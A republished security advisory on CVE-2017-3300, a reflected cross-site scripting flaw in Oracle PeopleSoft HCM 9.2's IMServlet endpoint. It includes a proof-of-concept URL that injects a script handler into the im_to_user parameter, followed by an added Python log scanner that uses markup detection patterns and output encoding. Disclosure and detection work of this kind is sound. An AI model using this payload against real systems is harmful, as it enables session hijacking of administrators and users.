Oracle PeopleSoft HCM 9.2 Cross Site Scripting Vulnerability

Published: 23 Jan 2017
Reported by: Vahagn Vardanyan
Source: 0day.today (zdt)

Oracle PeopleSoft HCM 9.2 XSS Vulnerability

Related entries (family: title, published)

CNVD: Oracle PeopleSoft Enterprise PeopleTools Component Cross-Site Scripting Vulnerability, 24 Jan 2017
CVE: CVE-2017-3300, 27 Jan 2017
Cvelist: CVE-2017-3300, 27 Jan 2017
erpscan: Oracle PeopleSoft – XSS vulnerability, 31 Oct 2016
EUVD: EUVD-2017-12421, 7 Oct 2025
NVD: CVE-2017-3300, 27 Jan 2017
Oracle: Oracle Critical Patch Update Advisory - January 2017, 17 Jan 2017
OSV: CVE-2017-3300, 27 Jan 2017
Packet Storm: Oracle PeopleSoft HCM 9.2 Cross Site Scripting, 23 Jan 2017
Prion: Code injection, 27 Jan 2017

Application: Oracle PeopleSoft

Vendor: Oracle

Bugs: XSS

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017

Reference: Oracle CPU Jan 2017

Authors: Vahagn Vardanyan, Dmitry Yudin



1. ADVISORY INFORMATION

Title: Oracle PeopleSoft XSS vulnerability

Advisory ID: [ERPSCAN-17-005]

Risk: High

Advisory URL:
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

Date published: 17.01.2017

Vendor contacted: Oracle



2. VULNERABILITY INFORMATION

Class: XSS [CWE-79]

Remotely Exploitable: Yes

Locally Exploitable: No

CVE Name: CVE-2017-3300

CVSS Base Score: 6.1



3. VULNERABILITY DESCRIPTION

An attacker can use a special HTTP request to hijack session data of
administrators or users.



4. VULNERABLE PACKAGES


$ psreleaseinfo

ToolsRelease: 8.55.03

ToolsReleaseDB: 8.55



PeopleSoft HCM 9.2



PORTAL.war/WEB-INF/lib/mcfIM.jar



$ md5sum ./PORTAL.war/WEB-INF/lib/mcfIM.jar

36982c7d3c059ec9c2d9aaf0c35a65d3 ./PORTAL.war/WEB-INF/lib/mcfIM.jar



5. SOLUTIONS AND WORKAROUNDS

Oracle CPU January 2017


6. AUTHOR


Dmitri Yudin (@ret5et)/ERPScan & Vahagn Vardanyan (@vah_13)/ERPScan



7. TECHNICAL DESCRIPTION



7.1. Proof of Concept



xss


http://localhost:8000/IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E
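The request above is reflected XSS in the im_to_user parameter of the IMServlet endpoint: the value is echoed into the response without output encoding. The following Python is an added example, not part of the advisory or of any ERPScan or Oracle code. It URL-decodes the query string of web-server access log lines (the log lines are constructed for the example, with the advisory's PoC payload embedded in the second one), flags IMServlet requests whose decoded parameter values carry markup, and shows the output-encoding step that renders such a value inert when it is reflected.

```python
from html import escape
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access log lines (not from the advisory).
# Line 2 carries the advisory's PoC payload in the im_to_user parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jan/2017:10:00:01 +0000] "GET /IMServlet?Method=MSN_PRESENCE'
    '&im_server_name=MSN&im_to_user=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [23/Jan/2017:10:00:07 +0000] "GET /IMServlet?Method=MSN_PRESENCE'
    '&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27'
    'http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.'
    'location%29%27/%3E%3C/a%3E HTTP/1.1" 200 2048',
    '10.0.0.7 - - [23/Jan/2017:10:00:09 +0000] "GET /psp/ps/EMPLOYEE/HRMS/h/'
    '?tab=DEFAULT HTTP/1.1" 200 9000',
]

# Substrings that should never appear in a decoded IMServlet parameter value.
MARKUP_MARKERS = ("<", ">", "onload=", "onerror=", "javascript:")


def request_target(line):
    """Extract the request target (path + query) from a combined-format line."""
    return line.split('"')[1].split(" ")[1]


def suspicious_params(line):
    """Return {param: decoded_value} for IMServlet requests whose decoded
    query values contain markup; an empty dict for anything else."""
    parts = urlsplit(request_target(line))
    if not parts.path.endswith("/IMServlet"):
        return {}
    hits = {}
    # parse_qs percent-decodes values, so %3C becomes '<' before matching.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if any(marker in value.lower() for marker in MARKUP_MARKERS):
                hits[name] = value
    return hits


def scan(lines):
    """Return (line_index, hits) for every log line that trips the check."""
    return [(i, h) for i, h in ((i, suspicious_params(l)) for i, l in enumerate(lines)) if h]


def reflect_safely(value):
    """Output-encode a value before reflecting it into HTML (the CWE-79 fix):
    '<', '>', '&' and quotes become entities, so no tag or handler is created."""
    return escape(value, quote=True)
```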



8. REPORT TIMELINE

Reported: 31.10.2016

Vendor response: 1.11.2016

Date of Public Advisory: 17.01.2017



9. REFERENCES

http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/

#  0day.today [2018-01-01]  #
